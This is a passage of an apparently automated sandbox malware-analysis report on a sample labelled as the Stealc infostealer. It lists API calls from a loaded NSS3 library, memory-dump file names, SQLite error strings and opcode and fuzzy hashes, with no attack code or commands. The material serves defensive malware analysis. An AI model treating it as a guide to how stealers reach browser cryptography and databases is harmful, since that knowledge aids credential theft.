                                                                                                                                                                              • Part of subcall function 6C8DADC0: TlsGetValue.KERNEL32(?,6C8BCDBB,?,6C8BD079,00000000,00000001), ref: 6C8DAEB1
                                                                                                                                                                              • Part of subcall function 6C8DADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C8BCDBB,?,6C8BD079,00000000,00000001), ref: 6C8DAEC9
                                                                                                                                                                            • PK11_FreeSymKey.NSS3(?,6C925D40,00000000,?,?,6C916AC6,6C92639C), ref: 6C93AC44
                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,6C925D40,00000000,?,?,6C916AC6,6C92639C), ref: 6C93AC59
                                                                                                                                                                            • free.MOZGLUE(8CB6FF01,6C916AC6,6C92639C,?,?,?,?,?,?,?,?,?,6C925D40,00000000,?,6C92AAD4), ref: 6C93AC62
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1595327144-0
                                                                                                                                                                            • Opcode ID: 3380e7fcbdf8fef1ee38598082f1b86f52fb1bc9cc64855cd7ac434a541dd680
                                                                                                                                                                            • Instruction ID: 1f4f26d4ceb41ed937824afec89358335e7580bd76893f59822ee9d55d0194e1
                                                                                                                                                                            • Opcode Fuzzy Hash: 3380e7fcbdf8fef1ee38598082f1b86f52fb1bc9cc64855cd7ac434a541dd680
                                                                                                                                                                            • Instruction Fuzzy Hash: 56018BB56002109FDF10DF59E9C0B8677ACAF98B5DF188468E84D8F706DB30E808CBA1
                                                                                                                                                                            APIs
                                                                                                                                                                            • PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6C899003,?), ref: 6C8EFD91
                                                                                                                                                                              • Part of subcall function 6C8F0BE0: malloc.MOZGLUE(6C8E8D2D,?,00000000,?), ref: 6C8F0BF8
                                                                                                                                                                              • Part of subcall function 6C8F0BE0: TlsGetValue.KERNEL32(6C8E8D2D,?,00000000,?), ref: 6C8F0C15
                                                                                                                                                                            • PORT_Alloc_Util.NSS3(A4686C8F,?), ref: 6C8EFDA2
                                                                                                                                                                            • memcpy.VCRUNTIME140(00000000,12D068C3,A4686C8F,?,?), ref: 6C8EFDC4
                                                                                                                                                                            • free.MOZGLUE(00000000,?,?), ref: 6C8EFDD1
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Alloc_Util$Valuefreemallocmemcpy
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2335489644-0
                                                                                                                                                                            • Opcode ID: 54df3fa87e3f842639d8fe4cfd31debfe8d710a0085c25f5fbe5e4c672fe6a95
                                                                                                                                                                            • Instruction ID: 95509f5d2a5e8d0d0b55442e2a0b254ddd0e9c80b660e0837c497e6bbbad31a5
                                                                                                                                                                            • Opcode Fuzzy Hash: 54df3fa87e3f842639d8fe4cfd31debfe8d710a0085c25f5fbe5e4c672fe6a95
                                                                                                                                                                            • Instruction Fuzzy Hash: E4F0FCF17012066BEF104F55FD809577F58EFA929AB148534ED198BB01E722D815C7E1
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CriticalDeleteSectionfree
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2988086103-0
                                                                                                                                                                            • Opcode ID: 50556a8d684f7df0363f3eac9649411fc18f40982b156b184fc61cd47e41f030
                                                                                                                                                                            • Instruction ID: 7171d0584dab3b33108082997c4869a8d4d0c0e99064989c27d188249977b4e8
                                                                                                                                                                            • Opcode Fuzzy Hash: 50556a8d684f7df0363f3eac9649411fc18f40982b156b184fc61cd47e41f030
                                                                                                                                                                            • Instruction Fuzzy Hash: 18E03076704618ABCB10EFA8DC448867BACEF4D2703190525E691D3700D231F905CBA1
                                                                                                                                                                            APIs
                                                                                                                                                                            • sqlite3_value_text.NSS3 ref: 6C889E1F
                                                                                                                                                                              • Part of subcall function 6C8413C0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,6C812352,?,00000000,?,?), ref: 6C841413
                                                                                                                                                                              • Part of subcall function 6C8413C0: memcpy.VCRUNTIME140(00000000,6C812352,00000002,?,?,?,?,6C812352,?,00000000,?,?), ref: 6C8414C0
                                                                                                                                                                            Strings
                                                                                                                                                                            • LIKE or GLOB pattern too complex, xrefs: 6C88A006
                                                                                                                                                                            • ESCAPE expression must be a single character, xrefs: 6C889F78
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: memcpysqlite3_value_textstrlen
                                                                                                                                                                            • String ID: ESCAPE expression must be a single character$LIKE or GLOB pattern too complex
                                                                                                                                                                            • API String ID: 2453365862-264706735
                                                                                                                                                                            • Opcode ID: 79ff59bb8fe37b592120c2f750650c2d69bd8399bd328241fb2a3656b32aa4fd
                                                                                                                                                                            • Instruction ID: 85b7f1abaac133bad4c89913ab8cf29bfa9ba3f5661a39f2f001586c21a8106a
                                                                                                                                                                            • Opcode Fuzzy Hash: 79ff59bb8fe37b592120c2f750650c2d69bd8399bd328241fb2a3656b32aa4fd
                                                                                                                                                                            • Instruction Fuzzy Hash: 77812D70A062558BD724CF39C2803AEBBF2AF45318F288A59D8A59BFC1D735D846C791
                                                                                                                                                                            APIs
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C8E4D57
                                                                                                                                                                            • PR_snprintf.NSS3(?,00000008,%d.%d,?,?), ref: 6C8E4DE6
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorR_snprintf
                                                                                                                                                                            • String ID: %d.%d
                                                                                                                                                                            • API String ID: 2298970422-3954714993
                                                                                                                                                                            • Opcode ID: 299a537455e07097ce483150aaa1fd2018fa17c9bf42b72a27c5693603426834
                                                                                                                                                                            • Instruction ID: faa5169591e499cf0515894f5d692ef7fd7f016e632d7dfafcefcaea880ba5df
                                                                                                                                                                            • Opcode Fuzzy Hash: 299a537455e07097ce483150aaa1fd2018fa17c9bf42b72a27c5693603426834
                                                                                                                                                                            • Instruction Fuzzy Hash: C63120B2E042186BEB205BA59D01BFF7778DFC5309F050829ED1957741EB70D905CBA2
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Value$calloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3339632435-0
                                                                                                                                                                            • Opcode ID: 785e9ec07a863faef3c62cbc954e7e5a1b7807b1cbd1b68453ca36cd6a4710f4
                                                                                                                                                                            • Instruction ID: 148ca34535f1d97055288fa368706186007c6f7160a8374534593503c1eb51f6
                                                                                                                                                                            • Opcode Fuzzy Hash: 785e9ec07a863faef3c62cbc954e7e5a1b7807b1cbd1b68453ca36cd6a4710f4
                                                                                                                                                                            • Instruction Fuzzy Hash: C731E8B1649385CFDB206F7CD7846697BB4BF06388F214E6DD8A887A11DB309086CB91
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: free
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                            • Opcode ID: 451fd62061e4b7f9705595f264ed1c1942e48b3284f8004b3adcf44ae6ae8684
                                                                                                                                                                            • Instruction ID: b04306a3c2b60b0d64e0d077bf0d32ba8b7f4c8cd8cfd7fb385a5c1316726450
                                                                                                                                                                            • Opcode Fuzzy Hash: 451fd62061e4b7f9705595f264ed1c1942e48b3284f8004b3adcf44ae6ae8684
                                                                                                                                                                            • Instruction Fuzzy Hash: EAF0E9B1704115ABEF10DBA9EC45D27776CEF49594B140834EC5DC3A00E725F42187B1